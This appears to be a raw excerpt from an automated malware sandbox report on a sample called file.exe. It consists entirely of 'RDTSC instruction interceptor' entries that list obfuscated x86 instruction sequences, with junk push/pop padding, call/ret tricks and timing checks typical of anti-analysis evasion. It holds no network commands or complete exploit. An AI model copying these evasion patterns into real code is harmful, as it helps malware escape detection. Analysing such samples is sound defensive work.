                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53794 second address: B537B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2272h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FF154EB2266h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B52A7C second address: B52A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B537B2 second address: B53845 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF154EB2266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FF154EB2275h 0x00000012 jmp 00007FF154EB226Eh 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FF154EB2268h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov ebx, edi 0x00000035 push 00000000h 0x00000037 pushad 0x00000038 mov dx, di 0x0000003b mov dword ptr [ebp+12475EAEh], eax 0x00000041 popad 0x00000042 sub dword ptr [ebp+1244CDBAh], ecx 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push ebx 0x0000004d call 00007FF154EB2268h 0x00000052 pop ebx 0x00000053 mov dword ptr [esp+04h], ebx 0x00000057 add dword ptr [esp+04h], 0000001Ah 0x0000005f inc ebx 0x00000060 push ebx 0x00000061 ret 0x00000062 pop ebx 0x00000063 ret 0x00000064 or di, 26B3h 0x00000069 push eax 0x0000006a push ebx 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B52A82 second address: B52B11 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007FF154CE3616h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 nop 0x00000016 mov bx, BF45h 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov dword ptr [ebp+122D1876h], ebx 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007FF154CE3618h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 jnl 00007FF154CE3628h 0x0000004e mov eax, dword ptr [ebp+122D09B5h] 0x00000054 or dword ptr [ebp+1248882Ch], ebx 0x0000005a push FFFFFFFFh 0x0000005c mov dword ptr [ebp+1244EA9Ah], ebx 0x00000062 nop 0x00000063 jns 00007FF154CE361Eh 0x00000069 jnl 00007FF154CE3618h 0x0000006f push edx 0x00000070 pop edx 0x00000071 push eax 0x00000072 push ecx 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54768 second address: B5476C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55628 second address: B5563E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnl 00007FF154CE3616h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54908 second address: B5490C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5563E second address: B5568C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF154CE3616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c sbb bx, 4AE6h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FF154CE3618h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov ebx, dword ptr [ebp+122D2058h] 0x00000033 mov dword ptr [ebp+122D1B7Dh], esi 0x00000039 push 00000000h 0x0000003b clc 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f push esi 0x00000040 push esi 0x00000041 pop esi 0x00000042 pop esi 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5568C second address: B556AB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF154EB226Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jbe 00007FF154EB228Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007FF154EB2266h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B56766 second address: B567F1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF154CE3616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FF154CE361Ch 0x00000010 js 00007FF154CE3616h 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007FF154CE3625h 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FF154CE3618h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 jmp 00007FF154CE361Fh 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edx 0x00000042 call 00007FF154CE3618h 0x00000047 pop edx 0x00000048 mov dword ptr [esp+04h], edx 0x0000004c add dword ptr [esp+04h], 00000018h 0x00000054 inc edx 0x00000055 push edx 0x00000056 ret 0x00000057 pop edx 0x00000058 ret 0x00000059 cld 0x0000005a push 00000000h 0x0000005c mov bh, 85h 0x0000005e push eax 0x0000005f jc 00007FF154CE3624h 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B567F1 second address: B567F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B577FC second address: B57802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B57802 second address: B5788B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FF154EB2268h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 mov ebx, 0B627BDAh 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007FF154EB2268h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov ebx, dword ptr [ebp+122D20D1h] 0x00000048 push 00000000h 0x0000004a or ebx, dword ptr [ebp+122D1DDAh] 0x00000050 xchg eax, esi 0x00000051 pushad 0x00000052 pushad 0x00000053 push esi 0x00000054 pop esi 0x00000055 jmp 00007FF154EB2273h 0x0000005a popad 0x0000005b jns 00007FF154EB226Ch 0x00000061 popad 0x00000062 push eax 0x00000063 pushad 0x00000064 pushad 0x00000065 push eax 0x00000066 pop eax 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B589A1 second address: B589B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF154CE3616h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B589B0 second address: B58A0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+122D2BD6h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FF154EB2268h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov ebx, ecx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007FF154EB2268h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 cmc 0x00000049 push eax 0x0000004a push ecx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B58A0E second address: B58A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B57A5F second address: B57A7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF154EB2277h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59A0D second address: B59A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59A11 second address: B59A15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59A15 second address: B59A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59A1B second address: B59A21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59C4C second address: B59C6F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF154CE3628h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C9EA second address: B5C9F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C9F0 second address: B5C9FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF154CE3616h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C9FA second address: B5CA80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FF154EB2268h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 or ebx, dword ptr [ebp+12459009h] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FF154EB2268h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov edi, dword ptr [ebp+122D37ECh] 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+122D1AC9h], edi 0x00000055 xchg eax, esi 0x00000056 jmp 00007FF154EB226Dh 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FF154EB2271h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5CA80 second address: B5CA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D8F0 second address: B5D8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5CB5A second address: B5CB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D8FF second address: B5D905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0285D second address: B02885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF154CE3616h 0x0000000a jmp 00007FF154CE3624h 0x0000000f popad 0x00000010 push ecx 0x00000011 jc 00007FF154CE3616h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B668A3 second address: B668DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b jmp 00007FF154EB2278h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 jmp 00007FF154EB226Dh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A21C second address: B6A220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A220 second address: B6A272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c pushad 0x0000000d jmp 00007FF154EB2279h 0x00000012 jmp 00007FF154EB2273h 0x00000017 popad 0x00000018 pop ebx 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF154EB2273h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A272 second address: B6A282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF154CE361Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A504 second address: B6A50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A50B second address: B6A510 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A510 second address: 9919BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 504A06DAh 0x0000000e jg 00007FF154EB226Eh 0x00000014 push dword ptr [ebp+122D0365h] 0x0000001a cmc 0x0000001b jp 00007FF154EB226Eh 0x00000021 call dword ptr [ebp+122D1AA9h] 0x00000027 pushad 0x00000028 xor dword ptr [ebp+122D1B27h], esi 0x0000002e xor eax, eax 0x00000030 sub dword ptr [ebp+122D1B27h], eax 0x00000036 mov dword ptr [ebp+122D1B27h], edx 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 pushad 0x00000041 add dword ptr [ebp+122D1B27h], edx 0x00000047 mov dh, E2h 0x00000049 popad 0x0000004a mov dword ptr [ebp+122D38A4h], eax 0x00000050 jl 00007FF154EB226Ch 0x00000056 sub dword ptr [ebp+122D1B27h], edx 0x0000005c mov esi, 0000003Ch 0x00000061 mov dword ptr [ebp+122D1DFCh], eax 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b cld 0x0000006c lodsw 0x0000006e or dword ptr [ebp+122D1B27h], edi 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 pushad 0x00000079 mov dword ptr [ebp+122D1DFCh], eax 0x0000007f popad 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jl 00007FF154EB226Dh 0x0000008a pushad 0x0000008b sbb bx, D62Dh 0x00000090 popad 0x00000091 nop 0x00000092 push eax 0x00000093 push edx 0x00000094 push eax 0x00000095 push edx 0x00000096 jng 00007FF154EB2266h 0x0000009c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF34F6 second address: AF34FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B713FC second address: B71402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71402 second address: B7140A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7140A second address: B7140F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B719C5 second address: B719CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71B3E second address: B71B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154EB226Bh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7209A second address: B720A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF154CE3616h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B720A5 second address: B720AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FF154EB2266h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B720AF second address: B720D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF154CE3628h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7223D second address: B7226E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FF154EB226Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF154EB2279h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7226E second address: B72272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B723E4 second address: B72401 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72401 second address: B7241C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FF154CE3626h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72568 second address: B72588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FF154EB2272h 0x0000000d popad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72588 second address: B72591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72591 second address: B725C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2277h 0x00000007 pushad 0x00000008 jne 00007FF154EB2266h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jl 00007FF154EB2280h 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007FF154EB2266h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B725C6 second address: B725CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77E47 second address: B77E4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77E4B second address: B77E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77E55 second address: B77E67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB226Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B76A3E second address: B76A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B76D5B second address: B76D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7702F second address: B77079 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF154CE362Ah 0x00000008 jmp 00007FF154CE3624h 0x0000000d push edx 0x0000000e jmp 00007FF154CE3621h 0x00000013 jmp 00007FF154CE3624h 0x00000018 pop edx 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77079 second address: B7707D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7707D second address: B77099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154CE3620h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77099 second address: B7709D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7670B second address: B76724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FF154CE361Dh 0x0000000b jnl 00007FF154CE3616h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7765D second address: B77663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77663 second address: B77667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77667 second address: B7767B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FF154EB2268h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7767B second address: B7767F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77846 second address: B77892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FF154EB2271h 0x0000000b jmp 00007FF154EB2275h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF154EB2278h 0x00000017 jl 00007FF154EB2266h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B8FB second address: B7B8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B8FF second address: B7B90B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF154EB226Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B90B second address: B7B922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF154CE361Ah 0x0000000a push edi 0x0000000b pop edi 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
